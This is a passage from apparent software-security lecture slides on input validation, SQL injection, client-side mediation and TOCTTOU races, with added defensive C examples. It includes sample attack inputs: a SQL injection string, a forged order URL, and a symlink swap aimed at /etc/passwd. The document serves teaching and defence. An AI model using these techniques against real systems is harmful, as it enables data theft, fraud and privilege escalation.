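/* Longest argument copy_arg accepts into a buffer of dstsize bytes. */
size_t max_accepted_len(size_t dstsize)
{
    return dstsize == 0 ? 0 : dstsize - 1;
}

int main(int argc, char **argv)
{
    char buffer[8];                                    /* 7 characters + NUL */
    const char *arg = argc > 1 ? argv[1] : "example";  /* constructed default */

    if (copy_arg(buffer, sizeof buffer, arg))
        printf("copied: %s\n", buffer);
    else
        printf("rejected: argument longer than %zu characters\n",
               max_accepted_len(sizeof buffer));
    return 0;
}
```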

Page 70:

Input Validation

Consider web form data URL to be generated by client’s browser to access server.

GET and POST requests (Which is more secure?)

Suppose input is validated on client

For example, the following is valid:

http://www.things.com/orders/final&custID=112&num=55A&qty=20&price=10&shipping=5&total=205

Suppose input is not checked on server (why bother, since input is checked on client?)

Then attacker could send the http message:

http://www.things.com/orders/final&custID=112&num=55A&qty=20&price=10&shipping=5&total=25

User uses forged URL to access server

Page 71:

Incomplete Mediation

Linux kernel

Research has revealed many buffer overflows

Many of these are due to incomplete mediation

Linux kernel is “good” software since

Open-source

Kernel written by coding gurus

Tools exist to help find such problems

But incomplete mediation errors can be subtle

And tools useful to attackers too!

Page 72:

Incomplete Mediation (ex. SQL Injection)

Input: John Fiore

SELECT * from CUSTOMERS WHERE name = 'John Fiore'

Page 73:

Incomplete Mediation (ex. SQL Injection)

Input: John Fiore' or '1'='1

SELECT * from CUSTOMERS WHERE name = 'John Fiore' OR '1'='1'
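As an added example for the two SQL injection slides (our code, not from the slides), the block below reproduces the vulnerable construction, concatenating the name into the query text, and adds two server-side measures: a count of string literals in the generated text, which exposes input that has broken out of its quotes, and an allowlist check on the name field that rejects the quote and equals characters before any query is built. The function names are ours. The complete fix is a parameterized query, where the driver sends the value separately from the SQL text; it is described here rather than shown because its form depends on the database API.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The vulnerable pattern from the slides: the query is built by string
 * concatenation, so the input can change the SQL's structure. */
bool build_query_unsafe(char *out, size_t outsize, const char *name)
{
    int n = snprintf(out, outsize,
                     "SELECT * from CUSTOMERS WHERE name = '%s'", name);
    return n >= 0 && (size_t)n < outsize;
}

/* Detection aid: count single-quoted literals in the generated text. The
 * template contains exactly one; more than one means the input broke out. */
int count_literals(const char *sql)
{
    int quotes = 0;
    for (; *sql != '\0'; sql++)
        if (*sql == '\'')
            quotes++;
    return quotes / 2;
}

/* Mediation: allowlist for a customer name (letters, space, hyphen, period)
 * with a length bound. The limit of 64 is an assumption for illustration. */
bool name_is_valid(const char *name)
{
    size_t len, i;

    if (name == NULL)
        return false;
    len = strlen(name);
    if (len == 0 || len > 64)
        return false;
    for (i = 0; i < len; i++) {
        char c = name[i];
        bool ok = (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
                  c == ' ' || c == '-' || c == '.';
        if (!ok)
            return false;          /* rejects ' = ; and everything else */
    }
    return true;
}

int main(void)
{
    /* The two inputs shown on the slides. */
    const char *inputs[] = { "John Fiore", "John Fiore' or '1'='1" };
    char sql[256];
    size_t i;

    for (i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        if (!build_query_unsafe(sql, sizeof sql, inputs[i]))
            continue;
        printf("input: %-24s valid=%d literals=%d\n  %s\n", inputs[i],
               name_is_valid(inputs[i]), count_literals(sql), sql);
    }
    return 0;
}
```

The allowlist is deliberately strict and would reject legitimate names containing an apostrophe; that trade-off is why parameterized queries, which need no character restrictions at all, are the preferred defence, with input validation kept as a second layer.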

Page 74:

Client-side mediation

Forms that do client-side mediation

When you click “submit”, Javascript code will first run validation checks on the data you entered

If you enter invalid data, a popup will prevent you from submitting it

Related issue: client-side state

Many web sites rely on the client to keep state for them

Put hidden fields in the form which are passed back to the server when user submits the form

Problem: what if the user

Turns off Javascript?

Edits the form before submitting it?

Writes a script that interacts with the web server instead of using a web browser at all?

Connects to the server “manually”?

telnet server.com 80

Note that the user can send arbitrary (unmediated) values to the server this way

The user can also modify any client-side state

Page 75:

Defenses

Client-side mediation is an OK method to use in order to have a friendlier user interface

but is useless for security purposes.

You have to do server-side mediation

whether or not you also do client-side

For values entered by the user

Always do very careful checks on the values of all fields

These values can potentially contain completely arbitrary 8-bit data and be of any length

For state stored by the client:

Make sure the client has not modified the data in any way
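The defence for client-side state is the recomputation slide 68 mentions and this slide requires: the server treats the client's total as a claim, not a fact. As an added example (our code, not from the slides) covering the forged order URL on the "Input Validation" slide and the server-side rule here, the block below parses the query parameters, recomputes qty*price+shipping on the server and rejects the request when the client's total disagrees. The parameter names are the ones in the slide's URL; the parser, the per-field upper bound and the function names are ours.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct order {
    long long qty, price, shipping, total;
    bool have_qty, have_price, have_shipping, have_total;
};

/* Parse a non-negative decimal amount with an upper bound (assumed 1000000,
 * which also keeps qty*price far inside long long). Anything else, including
 * trailing characters or a sign, is rejected. */
static bool parse_amount(const char *s, long long *out)
{
    char *end;
    long long v;

    if (*s == '\0')
        return false;
    v = strtoll(s, &end, 10);
    if (*end != '\0' || v < 0 || v > 1000000)
        return false;
    *out = v;
    return true;
}

/* Parse "k=v&k=v..." (the part after "final&" in the slide's URL).
 * Unknown keys (custID, num) are ignored here; every known key must be
 * present and well formed for the parse to succeed. */
bool parse_order(const char *query, struct order *o)
{
    char buf[512];
    char *tok;

    if (query == NULL || strlen(query) >= sizeof buf)
        return false;
    strcpy(buf, query);                        /* length checked above */
    memset(o, 0, sizeof *o);
    for (tok = strtok(buf, "&"); tok != NULL; tok = strtok(NULL, "&")) {
        char *eq = strchr(tok, '=');
        const char *key, *val;
        if (eq == NULL)
            return false;
        *eq = '\0';
        key = tok;
        val = eq + 1;
        if (strcmp(key, "qty") == 0)
            o->have_qty = parse_amount(val, &o->qty);
        else if (strcmp(key, "price") == 0)
            o->have_price = parse_amount(val, &o->price);
        else if (strcmp(key, "shipping") == 0)
            o->have_shipping = parse_amount(val, &o->shipping);
        else if (strcmp(key, "total") == 0)
            o->have_total = parse_amount(val, &o->total);
    }
    return o->have_qty && o->have_price && o->have_shipping && o->have_total;
}

/* Server-side rule: accept only if the client's total equals the server's
 * own computation. In a real shop the price would also be looked up from the
 * catalogue rather than taken from the URL. */
bool order_is_consistent(const char *query)
{
    struct order o;
    long long expected;

    if (!parse_order(query, &o))
        return false;
    expected = o.qty * o.price + o.shipping;
    return expected == o.total;
}

int main(void)
{
    const char *valid  = "custID=112&num=55A&qty=20&price=10&shipping=5&total=205";
    const char *forged = "custID=112&num=55A&qty=20&price=10&shipping=5&total=25";

    printf("valid  URL: %s\n", order_is_consistent(valid)  ? "accepted" : "rejected");
    printf("forged URL: %s\n", order_is_consistent(forged) ? "accepted" : "rejected");
    return 0;
}
```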

Page 76:

Race Conditions (Time-of-Check to Time-of-Use Errors)

Page 77:

Race Condition

Security processes should be atomic

Occur “all at once”

Race conditions can arise when a security-critical process occurs in stages

Race condition errors are also known as TOCTTOU (“TOCK-too”) errors

Attacker makes change between stages

Often, between stage that gives authorization, but before stage that transfers ownership

Example: Unix mkdir

Page 78:

mkdir Race Condition

Chapter 11 Software flaws and malware

mkdir creates a new directory. How mkdir is supposed to work (figure):

1. Allocate space

2. Transfer ownership

Page 79:

mkdir Attack

Not really a “race”, but the attacker’s timing is critical

The mkdir race condition (figure):

1. Allocate space

2. Create link to password file

3. Transfer ownership

Page 80:

Race conditions are common

Race conditions may be more prevalent than buffer overflows

But race conditions harder to exploit

Buffer overflow is “low hanging fruit” today

To prevent race conditions, make security-critical processes atomic

Occur all at once, not in stages

Not always easy to accomplish in practice

Page 81:

Time-of-check to Time-of-use (TOCTTOU)

A delay between checking permission to perform certain operations and using this permission may enable the operations to be changed.

Example:

1) User attempts to write 100 bytes at end of file “abc”.

Description of operation is stored in a data structure.

2) OS checks user’s permissions on copy of data structure.

3) While user’s permissions are being checked, user changes data structure to describe operation to delete file “xyz” .

Can you find further examples?

Page 82:

Summary, Q & A

Software bug

Software vulnerability

Software security vs. Software quality

Type conversion errors

Null pointer errors

Integer overflow/underflow

Format string bugs: http://null-byte.wonderhowto.com/how-to/security-oriented-c-tutorial-0x14-format-string-vulnerability-part-i-buffer-overflows-nasty-little-brother-0167254/

• What types of threat are related to this lecture?

– Consider the STRIDE model!

Page 83:

Race Conditions: Example

• setuid allocates terminals to users

– a privileged operation

– supports writing contents of terminal to a log file

• first checks if the user has permissions to write to the requested file; if so, it opens the file for writing

• The attacker makes a symbolic link:

logfile -> file_he_owns

• Between the “check” and the “open”, he changes it:

logfile -> /etc/passwd

Page 84:

Race Conditions: The problem

• State of the system changed between the check for permission and the execution of operation

• File whose permissions were checked for writeability by the user (file_he_owns) wasn't the same file that was later written to (/etc/passwd)

– Even though they had the same name (logfile) at different points in time
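The fix for the log-file scenario on slides 81, 83 and 84 is to remove the window between the check and the use rather than to shorten it. As an added example (our code, not from the slides), the function below does the two things that achieve this on a POSIX system: it opens the path with O_NOFOLLOW, so a symbolic link at the final component is never followed, and it then checks the object it actually holds, via fstat() on the descriptor, instead of the name it was given. Whatever the path comes to mean afterwards no longer matters, because the descriptor is bound to one inode. The vulnerable sequence it replaces is access() or stat() on the path followed by open() on the same path. Function names are ours; it assumes a POSIX system such as Linux.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example: open `path` for appending only if the object reached is a
 * regular file owned by `owner` and the final path component is not a
 * symbolic link. Returns the descriptor, or -1 with errno set.
 *
 * There is no separate "check" step on the name: the only check is on the
 * already-opened descriptor, so nothing can be swapped between check and use. */
int open_log_safely(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_CLOEXEC);

    if (fd < 0)
        return -1;          /* a symlink at the last component fails with ELOOP */

    /* Inspect the file we actually hold, not the name we were given. */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != owner) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "example.log";  /* constructed default */
    const char msg[] = "log entry written through a verified descriptor\n";
    int fd = open_log_safely(path, getuid());

    if (fd < 0) {
        perror("open_log_safely");
        return 1;
    }
    if (write(fd, msg, sizeof msg - 1) < 0)
        perror("write");
    close(fd);
    return 0;
}
```

O_NOFOLLOW only protects the final component; if a directory earlier in the path is attacker-writable, the same symlink substitution can be played there, so a privileged program should also require the containing directory to be trusted (owned by root and not world-writable) or open it first and use openat() relative to that descriptor.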
